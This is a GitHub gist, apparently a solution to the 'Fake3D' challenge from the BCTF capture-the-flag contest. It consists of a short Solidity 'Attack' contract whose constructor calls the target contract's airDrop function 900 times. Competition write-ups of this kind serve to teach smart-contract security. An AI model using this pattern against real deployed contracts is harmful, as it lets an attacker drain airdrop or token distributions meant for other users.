Skip to content

Instantly share code, notes, and snippets.

@minhtt159
Created November 29, 2018 07:22
Show Gist options
  • Save minhtt159/7f0c671c125e7695d127c787157d918c to your computer and use it in GitHub Desktop.
Save minhtt159/7f0c671c125e7695d127c787157d918c to your computer and use it in GitHub Desktop.
BCTF - Fake3D
contract Attack{
address target = 0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a;
Fake3D game;
constructor() public{
game = Fake3D(target);
for (uint256 i=0; i<900; i++){
game.airDrop();
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment